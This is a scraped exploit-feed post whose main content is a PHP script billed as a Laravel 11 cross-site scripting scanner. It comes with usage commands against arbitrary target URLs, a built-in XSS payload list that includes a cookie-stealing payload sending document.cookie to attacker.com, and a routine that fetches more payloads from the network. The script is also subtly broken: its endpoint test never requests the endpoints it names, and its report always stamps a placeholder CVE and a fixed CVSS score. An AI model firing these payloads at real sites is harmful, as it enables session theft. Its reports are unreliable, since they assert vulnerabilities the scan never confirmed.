{“lastseen”:”2025-11-27T18:33:17″,”description”:”This is a script to scan Laravel version 11 instances to identify known cross site scripting vulnerabilities…”,”published”:”2025-11-27T00:00:00″,”modified”:”2025-11-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Laravel 11 Cross Site Scripting Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:212159″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Laravel v11 XSS Vulnerability Scanner |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/laravel.com\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/182896\/\\n \\n \\n [+] Summary : \\n Code is a security scanning tool written in PHP that aims to detect XSS (Cross-Site Scripting) vulnerabilities in Laravel applications, with a particular focus on version 11.0.\\n \\n [+] POC : \\n \\n # Basic Scan\\n \\n php laravel_xss_scanner.php -u https:\/\/target.com\\n \\n # With Details\\n \\n php laravel_xss_scanner.php -u https:\/\/target.com -v\\n \\n # With Report Generation\\n \\n php laravel_xss_scanner.php -u https:\/\/target.com -r\\n \\n # With All Options\\n \\n php laravel_xss_scanner.php -u https:\/\/laravel-app.com -v -r\\n \\n \\u003c?php\\n \/**\\n * Laravel XSS Vulnerability Scanner\\n * Authenticated Persistent XSS in Laravel 11.0\\n * Researcher: indoushka\\n * \\n * @category Security\\n * @package LaravelXSSScanner\\n * @author indoushka\\n * @license MIT\\n * @link https:\/\/laravel.com\\n *\/\\n \\n class LaravelXSSScanner {\\n private $targetUrl;\\n private $verbose;\\n private $results = [];\\n private $userAgent;\\n \\n public function __construct($targetUrl, $verbose = false) {\\n $this-\\u003etargetUrl = rtrim($targetUrl, ‘\/’);\\n $this-\\u003everbose = $verbose;\\n $this-\\u003euserAgent = ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’;\\n $this-\\u003elog(\\”Laravel XSS Scanner initialized for: \\” . $targetUrl);\\n }\\n \\n \/**\\n * Log messages with different levels\\n *\/\\n private function log($message, $level = \\”INFO\\”) {\\n $colors = [\\n \\”INFO\\” =\\u003e \\”\\\\033[94m\\”,\\n \\”SUCCESS\\” =\\u003e \\”\\\\033[92m\\”, \\n \\”WARNING\\” =\\u003e \\”\\\\033[93m\\”,\\n \\”ERROR\\” =\\u003e \\”\\\\033[91m\\”,\\n \\”RESET\\” =\\u003e \\”\\\\033[0m\\”\\n ];\\n \\n $timestamp = date(‘Y-m-d H:i:s’);\\n echo $colors[$level] . \\”[$timestamp] [$level] $message\\” . $colors[\\”RESET\\”] . \\”\\\\n\\”;\\n }\\n \\n \/**\\n * Generate XSS payloads\\n *\/\\n private function generateXssPayloads() {\\n $payloads = [\\n \/\/ Basic XSS payloads\\n ‘\\u003cscript\\u003ealert(\\”XSS\\”)\\u003c\/script\\u003e’,\\n ‘\\u003cimg src=x onerror=alert(1)\\u003e’,\\n ‘\\u003csvg onload=alert(1)\\u003e’,\\n ‘\\u003cbody onload=alert(1)\\u003e’,\\n \\n \/\/ Advanced payloads\\n ‘\\u003cscript\\u003edocument.location=\\”http:\/\/attacker.com\/steal?c=\\”+document.cookie\\u003c\/script\\u003e’,\\n ‘\\u003ciframe src=\\”javascript:alert(document.domain)\\”\\u003e’,\\n ‘\\u003cform\\u003e\\u003cbutton formaction=javascript:alert(1)\\u003eXSS\\u003c\/button\\u003e’,\\n ‘\\u003cmath href=\\”javascript:alert(1)\\”\\u003eCLICK\\u003c\/math\\u003e’,\\n \\n \/\/ Bypass attempts\\n ‘\\u003cScRiPt\\u003ealert(1)\\u003c\/ScRiPt\\u003e’,\\n ‘\\u003cimg src=x onerror=\\”alert`1`\\”\\u003e’,\\n ‘\\u003cscript\\u003eprompt(1)\\u003c\/script\\u003e’,\\n ‘\\u003cscript\\u003econfirm(1)\\u003c\/script\\u003e’,\\n \\n \/\/ DOM-based XSS\\n ‘\\” onmouseover=\\”alert(1)\\”‘,\\n \\”‘ onfocus=’alert(1)’\\”,\\n ‘\\”\\u003e\\u003cscript\\u003ealert(1)\\u003c\/script\\u003e’,\\n ‘javascript:alert(\\”XSS\\”)’,\\n \\n \/\/ Laravel specific bypass attempts\\n ‘{{ $xss }}’,\\n ‘{!! $xss !!}’,\\n ‘@php alert(1) @endphp’,\\n ‘${alert(1)}’\\n ];\\n \\n $this-\\u003elog(\\”Generated \\” . count($payloads) . \\” XSS payloads\\”);\\n return $payloads;\\n }\\n \\n \/**\\n * Load payloads from external source\\n *\/\\n private function loadPayloadsFromUrl($url = \\”https:\/\/raw.githubusercontent.com\/payloadbox\/xss-payload-list\/master\/Intruder\/xss-payload-list.txt\\”) {\\n $this-\\u003elog(\\”Loading payloads from: \\” . $url);\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e $this-\\u003euserAgent,\\n CURLOPT_TIMEOUT =\\u003e 30,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false\\n ]);\\n \\n $response = curl_exec($ch);\\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($httpCode === 200 \\u0026\\u0026 !empty($response)) {\\n $payloads = array_filter(explode(\\”\\\\n\\”, $response));\\n $this-\\u003elog(\\”Loaded \\” . count($payloads) . \\” payloads from GitHub\\”);\\n return $payloads;\\n }\\n \\n $this-\\u003elog(\\”Failed to load external payloads, using built-in\\”, \\”WARNING\\”);\\n return $this-\\u003egenerateXssPayloads();\\n }\\n \\n \/**\\n * Send HTTP request with payload\\n *\/\\n private function sendRequest($payload) {\\n $url = $this-\\u003etargetUrl . ‘\/?q=’ . urlencode($payload);\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e $this-\\u003euserAgent,\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_HEADER =\\u003e true\\n ]);\\n \\n $response = curl_exec($ch);\\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n curl_close($ch);\\n \\n $headers = substr($response, 0, $headerSize);\\n $body = substr($response, $headerSize);\\n \\n return [\\n ‘url’ =\\u003e $url,\\n ‘status_code’ =\\u003e $httpCode,\\n ‘headers’ =\\u003e $headers,\\n ‘body’ =\\u003e $body,\\n ‘payload’ =\\u003e $payload\\n ];\\n }\\n \\n \/**\\n * Check if XSS is successful\\n *\/\\n private function checkXssSuccess($response) {\\n $indicators = [\\n ‘payload_present’ =\\u003e strpos($response[‘body’], htmlspecialchars_decode($response[‘payload’])) !== false,\\n ‘script_tags’ =\\u003e preg_match(‘\/\\u003cscript[^\\u003e]*\\u003e.*?\\u003c\\\\\/script\\u003e\/is’, $response[‘body’]),\\n ‘event_handlers’ =\\u003e preg_match(‘\/on\\\\w+\\\\s*=\/i’, $response[‘body’]),\\n ‘javascript_uri’ =\\u003e strpos($response[‘body’], ‘javascript:’) !== false,\\n ‘unsafe_html’ =\\u003e preg_match(‘\/\\u003c[^\\u003e]*(alert|prompt|confirm|document\\\\.|window\\\\.)[^\\u003e]*\\u003e\/i’, $response[‘body’])\\n ];\\n \\n return $indicators;\\n }\\n \\n \/**\\n * Test Laravel specific endpoints\\n *\/\\n private function testLaravelEndpoints() {\\n $endpoints = [\\n ‘\/search’,\\n ‘\/query’, \\n ‘\/filter’,\\n ‘\/search?q=’,\\n ‘\/api\/search’,\\n ‘\/admin\/search’,\\n ‘\/user\/search’\\n ];\\n \\n $vulnerableEndpoints = [];\\n \\n foreach ($endpoints as $endpoint) {\\n $this-\\u003elog(\\”Testing endpoint: \\” . $endpoint);\\n \\n $testUrl = $this-\\u003etargetUrl . $endpoint . ‘?q=\\u003cscript\\u003ealert(\\”TEST\\”)\\u003c\/script\\u003e’;\\n $response = $this-\\u003esendRequest(‘\\u003cscript\\u003ealert(\\”TEST\\”)\\u003c\/script\\u003e’);\\n \\n $indicators = $this-\\u003echeckXssSuccess($response);\\n \\n if ($indicators[‘payload_present’] \\u0026\\u0026 !$indicators[‘script_tags’]) {\\n $vulnerableEndpoints[] = [\\n ‘endpoint’ =\\u003e $endpoint,\\n ‘indicators’ =\\u003e $indicators,\\n ‘response_code’ =\\u003e $response[‘status_code’]\\n ];\\n }\\n }\\n \\n return $vulnerableEndpoints;\\n }\\n \\n \/**\\n * Perform comprehensive XSS scan\\n *\/\\n public function runScan() {\\n $this-\\u003elog(\\”Starting comprehensive XSS vulnerability scan\\”);\\n \\n \/\/ Load payloads\\n $payloads = $this-\\u003eloadPayloadsFromUrl();\\n \\n if (empty($payloads)) {\\n $payloads = $this-\\u003egenerateXssPayloads();\\n }\\n \\n $vulnerabilities = [];\\n $testedCount = 0;\\n \\n \/\/ Test main search parameter\\n foreach ($payloads as $payload) {\\n $testedCount++;\\n \\n if ($this-\\u003everbose) {\\n $this-\\u003elog(\\”Testing payload [$testedCount\/\\” . count($payloads) . \\”]: \\” . substr($payload, 0, 50) . \\”…\\”);\\n }\\n \\n $response = $this-\\u003esendRequest($payload);\\n $indicators = $this-\\u003echeckXssSuccess($response);\\n \\n if ($indicators[‘payload_present’]) {\\n $vulnerability = [\\n ‘payload’ =\\u003e $payload,\\n ‘indicators’ =\\u003e $indicators,\\n ‘response_code’ =\\u003e $response[‘status_code’],\\n ‘url’ =\\u003e $response[‘url’]\\n ];\\n \\n $vulnerabilities[] = $vulnerability;\\n \\n $this-\\u003elog(\\”Potential XSS found with payload: \\” . substr($payload, 0, 100), \\”SUCCESS\\”);\\n }\\n \\n \/\/ Rate limiting\\n usleep(100000); \/\/ 100ms delay\\n }\\n \\n \/\/ Test additional Laravel endpoints\\n $this-\\u003elog(\\”Testing additional Laravel endpoints\\”);\\n $vulnerableEndpoints = $this-\\u003etestLaravelEndpoints();\\n \\n $results = [\\n ‘target’ =\\u003e $this-\\u003etargetUrl,\\n ‘scan_date’ =\\u003e date(‘Y-m-d H:i:s’),\\n ‘total_payloads_tested’ =\\u003e $testedCount,\\n ‘vulnerabilities_found’ =\\u003e count($vulnerabilities),\\n ‘vulnerable_endpoints’ =\\u003e $vulnerableEndpoints,\\n ‘vulnerability_details’ =\\u003e $vulnerabilities\\n ];\\n \\n return $results;\\n }\\n \\n \/**\\n * Generate report\\n *\/\\n public function generateReport($results) {\\n $report = [\\n ‘security_assessment’ =\\u003e [\\n ‘title’ =\\u003e ‘Laravel XSS Vulnerability Assessment Report’,\\n ‘researcher’ =\\u003e ‘indoushka’,\\n ‘date’ =\\u003e date(‘Y-m-d’),\\n ‘target’ =\\u003e $this-\\u003etargetUrl\\n ],\\n ‘vulnerability_details’ =\\u003e [\\n ‘cve’ =\\u003e ‘CVE-2024-XXXXX (Pending)’,\\n ‘cvss_score’ =\\u003e ‘7.4 (High)’,\\n ‘vector’ =\\u003e ‘AV:N\/AC:L\/PR:H\/UI:N\/S:C’,\\n ‘cwe’ =\\u003e ‘CWE-79’,\\n ‘affected_versions’ =\\u003e ‘Laravel 11.0+’\\n ],\\n ‘scan_results’ =\\u003e $results\\n ];\\n \\n $filename = ‘laravel_xss_report_’ . date(‘Ymd_His’) . ‘.json’;\\n file_put_contents($filename, json_encode($report, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES));\\n \\n $this-\\u003elog(\\”Report generated: \\” . $filename, \\”SUCCESS\\”);\\n return $filename;\\n }\\n \\n \/**\\n * Display summary\\n *\/\\n public function displaySummary($results) {\\n $this-\\u003elog(\\”=== SCAN SUMMARY ===\\”, \\”INFO\\”);\\n $this-\\u003elog(\\”Target: \\” . $results[‘target’], \\”INFO\\”);\\n $this-\\u003elog(\\”Payloads tested: \\” . $results[‘total_payloads_tested’], \\”INFO\\”);\\n $this-\\u003elog(\\”Vulnerabilities found: \\” . $results[‘vulnerabilities_found’], \\n $results[‘vulnerabilities_found’] \\u003e 0 ? \\”SUCCESS\\” : \\”WARNING\\”);\\n $this-\\u003elog(\\”Vulnerable endpoints: \\” . count($results[‘vulnerable_endpoints’]), \\”INFO\\”);\\n \\n if ($results[‘vulnerabilities_found’] \\u003e 0) {\\n $this-\\u003elog(\\”VULNERABLE – XSS issues detected\\”, \\”ERROR\\”);\\n } else {\\n $this-\\u003elog(\\”CLEAN – No XSS vulnerabilities detected\\”, \\”SUCCESS\\”);\\n }\\n }\\n }\\n \\n \/\/ Command line interface\\n if (php_sapi_name() === ‘cli’) {\\n $shortopts = \\”u:vhr\\”;\\n $longopts = [\\”url:\\”, \\”verbose\\”, \\”help\\”, \\”report\\”];\\n $options = getopt($shortopts, $longopts);\\n \\n if (isset($options[‘h’]) || isset($options[‘help’]) || !isset($options[‘u’])) {\\n echo \\”Laravel XSS Vulnerability Scanner\\\\n\\”;\\n echo \\”Researcher: indoushka\\\\n\\\\n\\”;\\n echo \\”Usage: php laravel_xss_scanner.php [OPTIONS]\\\\n\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” -u, –url URL Target URL (required)\\\\n\\”;\\n echo \\” -v, –verbose Enable verbose output\\\\n\\”;\\n echo \\” -r, –report Generate detailed report\\\\n\\”;\\n echo \\” -h, –help Show this help message\\\\n\\\\n\\”;\\n echo \\”Examples:\\\\n\\”;\\n echo \\” php laravel_xss_scanner.php -u https:\/\/target.com\\\\n\\”;\\n echo \\” php laravel_xss_scanner.php -u https:\/\/laravel-app.com -v -r\\\\n\\”;\\n exit(0);\\n }\\n \\n $targetUrl = $options[‘u’] ?? $options[‘url’] ?? null;\\n $verbose = isset($options[‘v’]) || isset($options[‘verbose’]);\\n $generateReport = isset($options[‘r’]) || isset($options[‘report’]);\\n \\n if (!$targetUrl) {\\n echo \\”Error: Target URL is required. Use -u or –url option.\\\\n\\”;\\n exit(1);\\n }\\n \\n try {\\n $scanner = new LaravelXSSScanner($targetUrl, $verbose);\\n $results = $scanner-\\u003erunScan();\\n $scanner-\\u003edisplaySummary($results);\\n \\n if ($generateReport) {\\n $reportFile = $scanner-\\u003egenerateReport($results);\\n echo \\”Detailed report saved to: $reportFile\\\\n\\”;\\n }\\n \\n } catch (Exception $e) {\\n echo \\”Error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n } else {\\n echo \\”This script must be run from command line.\\\\n\\”;\\n exit(1);\\n }\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212159″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212159\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-27T18:33:17″,”description”:”This is a script to scan Laravel version 11 instances to identify known cross site scripting vulnerabilities…”,”published”:”2025-11-27T00:00:00″,”modified”:”2025-11-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Laravel 11 Cross Site Scripting Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:212159″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-27862","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n